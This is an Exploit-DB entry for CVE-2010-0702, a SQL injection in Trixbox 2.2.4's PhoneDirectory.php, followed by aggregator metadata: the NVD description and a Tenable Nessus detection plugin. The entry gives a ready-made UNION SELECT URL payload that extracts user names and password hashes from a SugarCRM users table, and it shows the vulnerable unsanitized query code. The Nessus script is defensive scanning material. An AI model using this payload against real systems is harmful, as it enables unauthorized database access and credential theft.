ID EDB-ID:11508 Type exploitdb Reporter NorSlacker Modified 2010-02-19T00:00:00
Description
Trixbox PhonecDirectory.php SQL Injection. CVE-2010-0702. Webapps exploit for php platform
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
Example (Grab users / password hashes from sugarcrm)
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
$Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID' ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
...
}
#norslacker [at] gmail [dot] com
{"hash": "28ebccc8412850579d4566fb49664197a37aebfb12cc1c40859e1bc37ee3092a", "id": "EDB-ID:11508", "lastseen": "2016-02-01T14:27:43", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "edition": 1, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/11508/", "description": "Trixbox PhonecDirectory.php SQL Injection. CVE-2010-0702. Webapps exploit for php platform", "title": "Trixbox 2.2.4 - PhonecDirectory.php SQL Injection", "sourceData": "# Software Link: http://trixbox.org/downloads\r\n# Version: 2.2.4\r\n# Code : \r\nhttp://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]\r\n\r\nExample (Grab users / password hashes from sugarcrm) \r\nhttp://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id\r\n\r\n\r\nPhoneDirectory.php vulnerable code:\r\n# If the variable \"ID\" is passed in through the GET string, then display\r\n# extension, phone number and cell phone number for that record with the dial\r\n# key functionality\r\nif ($ID) {\r\n $PersonDirectoryListing = \"<CiscoIPPhoneDirectory>\\n\";\r\n\r\n $Query = \"SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other \";\r\n $Query .= \"FROM contacts WHERE id = '$ID' \";\r\n $Query .= \"ORDER BY last_name \";\r\n $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);\r\n\r\n ...\r\n\r\n}\r\n\r\n#norslacker [at] gmail [dot] com", "objectVersion": "1.0", "cvelist": ["CVE-2010-0702"], "published": "2010-02-19T00:00:00", "osvdbidlist": ["62572"], "references": [], "reporter": "NorSlacker", "modified": "2010-02-19T00:00:00", "href": "https://www.exploit-db.com/exploits/11508/"}
{"cve": [{"lastseen": "2017-08-17T11:14:43", "references": ["http://www.exploit-db.com/exploits/11508", "http://www.securityfocus.com/bid/38323", "http://packetstormsecurity.org/1002-exploits/tribox-sql.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56407"], "description": "SQL injection vulnerability in cisco/services/PhonecDirectory.php in Fonality Trixbox 2.2.4 allows remote attackers to execute arbitrary SQL commands via the ID parameter.", "edition": 2, "reporter": "NVD", "published": "2010-02-23T15:30:01", "title": "CVE-2010-0702", "type": "cve", "enchantments": {"score": {"modified": "2017-08-17T11:14:43", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-0702"], "scanner": [], "modified": "2017-08-16T21:32:04", "cpe": ["cpe:/a:fonality:trixbox:2.2.4"], "id": "CVE-2010-0702", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0702", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:59:45", "references": [], "pluginID": "44875", "description": "The version of the Cisco Phone Services phone directory script ('cisco/services/PhoneDirectory.php') installed as part of the web interface for trixbox (or Asterisk@Home, as it was formerly known) and hosted on the remote web server fails to sanitize input to the 'ID' parameter before using it in a database query.\n\nProvided PHP's 'magic_quotes_gpc' setting is disabled, an unauthenticated, remote attacker can leverage this issue to manipulate SQL queries and, for example, uncover sensitive information from the associated database, read arbitrary files, or execute arbitrary PHP code.", "edition": 5, "reporter": "Tenable", "published": "2010-02-23T00:00:00", "title": "trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0702"], "modified": "2018-08-01T00:00:00", "cpe": ["cpe:/a:fonality:trixbox"], "id": "TRIXBOX_CISCO_PHONEDIRECTORY_ID_SQLI.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44875", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44875);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/08/01 17:36:12\");\n\n script_cve_id(\"CVE-2010-0702\");\n script_bugtraq_id(38323);\n script_xref(name:\"EDB-ID\", value:\"11508\");\n\n script_name(english:\"trixbox Cisco Phone Services PhoneDirectory.php ID Parameter SQL Injection\");\n script_summary(english:\"Tries to manipulate a work phone number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is susceptible to a\nSQL injection attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Cisco Phone Services phone directory script\n('cisco/services/PhoneDirectory.php') installed as part of the web\ninterface for trixbox (or Asterisk@Home, as it was formerly known) and\nhosted on the remote web server fails to sanitize input to the 'ID'\nparameter before using it in a database query.\n\nProvided PHP's 'magic_quotes_gpc' setting is disabled, an\nunauthenticated, remote attacker can leverage this issue to manipulate\nSQL queries and, for example, uncover sensitive information from the\nassociated database, read arbitrary files, or execute arbitrary PHP\ncode.\");\n script_set_attribute(attribute:\"solution\", value:\"There is currently no known solution.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:fonality:trixbox\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"trixbox_web_detect.nbin\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/trixbox\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\nget_kb_item_or_exit(\"www/trixbox\");\n\n# This function converts a string to a concatenation of hex chars so we\n# can pass in strings without worrying about PHP's magic_quotes_gpc.\nfunction hexify(str)\n{\n local_var hstr, i, l;\n\n l = strlen(str);\n if (l == 0) return \"\";\n\n hstr = \"concat(\";\n for (i=0; i<l; i++)\n hstr += hex(ord(str[i])) + \",\";\n hstr[strlen(hstr)-1] = \")\";\n\n return hstr;\n}\n\n# Loop through directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/cisco/services\", cgi_dirs()));\nelse dirs = make_list(\"/cisco/services\");\n\nscript_found = FALSE;\nforeach dir (dirs)\n{\n # Try to exploit the issue to manipulate the work phone number.\n exploit = \"-\" + rand() % 1000 + \"' UNION SELECT 0,0,0,0,\" + hexify(str:SCRIPT_NAME) + \",0,0 -- '\";\n\n # Try to exploit the issue.\n url = dir + '/PhoneDirectory.php?' +\n 'ID=' + str_replace(find:\" \", replace:\"%20\", string:exploit);\n\n res = http_send_recv3(port:port, method:\"GET\", item:url, exit_on_fail : TRUE);\n\n if (res[2] && '<CiscoIPPhone' >< res[2])\n {\n script_found = TRUE;\n\n if (\n '<CiscoIPPhoneDirectory>' >< res[2] &&\n '<Name>Work:</Name>' >< res[2] &&\n '<Telephone>'+SCRIPT_NAME+'</Telephone>' >< res[2]\n )\n {\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report = '\\n' +\n 'Nessus was able to verify the issue by manipulating the work phone\\n' +\n 'number for a random ID using the following URL :\\n' +\n '\\n' +\n ' ' + build_url(port:port, qs:url) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n }\n }\n}\ninstall = build_url(qs:\"/\", port:port);\nif (!script_found) audit(AUDIT_WEB_APP_EXT_NOT_INST, \"trixbox\", install, \"Cisco Phone Services directory script\");\nelse audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, \"trixbox\", install, \"Cisco Phone Services directory script\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
